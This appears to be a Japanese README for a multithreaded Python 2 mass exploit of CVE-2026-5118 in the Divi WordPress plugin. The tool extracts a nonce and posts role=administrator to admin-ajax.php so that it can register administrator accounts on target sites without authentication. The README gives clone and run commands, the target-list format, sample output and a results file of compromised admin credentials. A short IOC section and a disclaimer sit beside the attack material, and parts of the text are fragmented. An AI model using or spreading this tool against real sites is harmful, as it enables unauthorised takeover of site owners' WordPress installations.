
CVE-2026-5118 – Divi WordPressプラグイン向けPython2マスエクスプロイト。admin-ajax.php経由の未認証の管理者登録。nonce抽出機能付きマルチスレッドスキャナー。
⚠️ 警告: このツールは、許可された侵入テストおよびセキュリティ研究専用です。
許可なくコンピュータシステムにアクセスすることは違法です。所有しているシステム、または明示的な書面による許可を得たシステムでのみ使用してください。 詳細な免責事項は、Jenderal92 のカバーに記載されている免責事項をご覧ください。こちらで確認できます ここ!!!
この Python 2 スクリプトは、Divi WordPress プラグイン(および関連する Divi フォーム)の権限昇格の脆弱性を悪用します。これにより、リモートから 管理者 アカウントを登録できます:
fb_nonce を抽出します。role=administrator を指定した細工済みのマルチパートリクエストを /wp-admin/admin-ajax.php に送信します。https:// を追加します。de_fb_obj)を使用した Nonce 抽出。success、user_id、user created など)による 成功検出。results.txt に以下の形式で保存されます:https://target.com/wp-admin/ | username | passwordurllib2、Queue、threading を使用。変更なしでは Python 3 と互換性がありません)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
1 行に 1 つのドメインまたは URL を記載したテキストファイルを作成します。http:// / https:// は省略できます。スクリプトがデフォルトで https:// を追加します。
targets.txt の例:
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] Total targets : 4
[*] Credentials : Attacker / Attacker@123#+
[*] Threads : 20
[*] Output file : results.txt
[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/
[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/
[3] Checking http://192.168.1.100/wordpress
[3] FAILED http://192.168.1.100/wordpress
[4] Checking https://test-site.org
[4] FAILED https://test-site.org
=== DONE ===
Successful: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
スクリプトの先頭にある以下の変数をカスタマイズできます:
https:// を追加します。fb_nonce を検索します。multipart/form-data POST を構築します:
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<抽出された nonce>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_emailDivi を使用している WordPress 管理者向け:
admin-ajax.php リクエストを監視します。role パラメータを含む登録フォームを公開しないでください。侵害の指標(IOC):
action=de_fb_ajax_submit_ajax_handler を含む予期しない admin-ajax.php リクエストAttacker)を持つ新しい管理者ユーザーrole=administrator を含む POST データこのソフトウェアは、教育目的および許可されたセキュリティテスト専用に提供されています。作者は、このツールの誤用または損害について一切の責任を負いません。本ソフトウェアを使用することにより、以下に同意したものとみなされます:
これらの条件に違反すると、刑事訴追、罰金、または禁固刑につながる可能性があります。
改善点(Python 3 移植、より優れた nonce 抽出、追加の登録パス検出)に関するプルリクエストを歓迎します。倫理的な免責事項を維持してください。
| 変数 | デフォルト | 説明 |
|---|
DEFAULT_USERNAME | Attacker | 登録するユーザー名 |
DEFAULT_PASSWORD | Attacker@123#+ | パスワード(特殊文字を含む強力なもの) |
DEFAULT_EMAIL | [email protected] | メールアドレス |
THREAD_COUNT | 20 | 同時スレッド数 |
OUTPUT_FILE | results.txt | 成功したターゲットを保存するファイル |